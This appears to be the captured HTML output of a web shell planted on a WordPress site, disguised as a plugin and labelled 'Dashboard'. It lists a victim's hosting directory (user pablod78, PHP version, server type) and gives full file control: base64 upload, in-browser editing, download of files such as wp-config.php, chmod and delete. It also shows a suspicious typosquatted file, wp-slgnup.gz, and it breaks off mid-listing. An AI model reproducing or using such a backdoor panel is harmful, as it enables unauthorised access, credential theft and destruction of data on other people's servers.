{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-09-21 14:29:47"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2">home2</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78">pablod78</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html">public_html</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
                        <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <table class="file-table">
                <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Actions</th></tr></thead>
                <tbody id="file-list">
                                            <tr><td colspan="5"><a href="?p=%2Fhome2%2Fpablod78" class="folder-link">📂 Parent Directory</a></td></tr>
                                                                <tr data-name="cgi-bin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fcgi-bin" class="folder-link">📁 cgi-bin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-06 19:01</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/cgi-bin','cgi-bin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/cgi-bin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/cgi-bin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="paulo.medeiros">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fpaulo.medeiros" class="folder-link">📁 paulo.medeiros</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-09 23:32</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/paulo.medeiros','paulo.medeiros')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/paulo.medeiros','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/paulo.medeiros',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-admin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-admin" class="folder-link">📁 wp-admin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-07 02:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-admin','wp-admin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-admin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-admin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-content">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-content" class="folder-link">📁 wp-content</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 10:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-content','wp-content')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-content','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-content',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-includes">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-includes" class="folder-link">📁 wp-includes</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-09-17 20:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-includes','wp-includes')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-includes','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-includes',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                                <tr data-name="about.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="file-link">📄 about.php</a></td>
                            <td class="size">3.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 08:13</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/about.php','about.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/about.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/about.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="default.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="file-link">📄 default.html</a></td>
                            <td class="size">381 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-19 08:55</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/default.html','default.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/default.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/default.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="error_log">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="file-link">📄 error_log</a></td>
                            <td class="size">24.2 MB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-18 23:08</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/error_log','error_log')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/error_log','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/error_log',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="index.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="file-link">📄 index.php</a></td>
                            <td class="size">405 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-06 19:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/index.php','index.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/index.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/index.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="license.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="file-link">📄 license.txt</a></td>
                            <td class="size">19.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-17 20:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/license.txt','license.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/license.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/license.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="readme.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="file-link">📄 readme.html</a></td>
                            <td class="size">7.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-17 20:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/readme.html','readme.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/readme.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/readme.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="robots.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="file-link">📄 robots.txt</a></td>
                            <td class="size">108 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/robots.txt','robots.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/robots.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/robots.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-activate.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="file-link">📄 wp-activate.php</a></td>
                            <td class="size">7.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-activate.php','wp-activate.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-activate.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-activate.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-blog-header.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="file-link">📄 wp-blog-header.php</a></td>
                            <td class="size">351 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-17 20:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-blog-header.php','wp-blog-header.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-blog-header.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-blog-header.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-comments-post.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="file-link">📄 wp-comments-post.php</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2023-06-14 17:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-comments-post.php','wp-comments-post.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-comments-post.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-comments-post.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config-sample.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="file-link">📄 wp-config-sample.php</a></td>
                            <td class="size">3.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config-sample.php','wp-config-sample.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config-sample.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config-sample.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="file-link">📄 wp-config.php</a></td>
                            <td class="size">3.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-09 23:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config.php','wp-config.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-cron.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="file-link">📄 wp-cron.php</a></td>
                            <td class="size">5.5 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-07-06 18:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-cron.php','wp-cron.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-cron.php','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-cron.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-links-opml.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="file-link">📄 wp-links-opml.php</a></td>
                            <td class="size">2.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-links-opml.php','wp-links-opml.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-links-opml.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-links-opml.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-load.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="file-link">📄 wp-load.php</a></td>
                            <td class="size">3.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-03-11 13:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-load.php','wp-load.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-load.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-load.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-login.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="file-link">📄 wp-login.php</a></td>
                            <td class="size">51.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-login.php','wp-login.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-login.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-login.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-mail.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="file-link">📄 wp-mail.php</a></td>
                            <td class="size">8.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-mail.php','wp-mail.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-mail.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-mail.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-settings.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="file-link">📄 wp-settings.php</a></td>
                            <td class="size">32.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-settings.php','wp-settings.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-settings.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-settings.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-signup.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="file-link">📄 wp-signup.php</a></td>
                            <td class="size">34.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-signup.php','wp-signup.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-signup.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-signup.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-slgnup.gz">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="file-link">📄 wp-slgnup.gz</a></td>
                            <td class="size">2.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-18 05:53</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-slgnup.gz','wp-slgnup.gz')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-slgnup.gz','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-slgnup.gz',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-trackback.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="file-link">📄 wp-trackback.php</a></td>
                            <td class="size">5.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-trackback.php','wp-trackback.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-trackback.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-trackback.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xmlrpc.php">
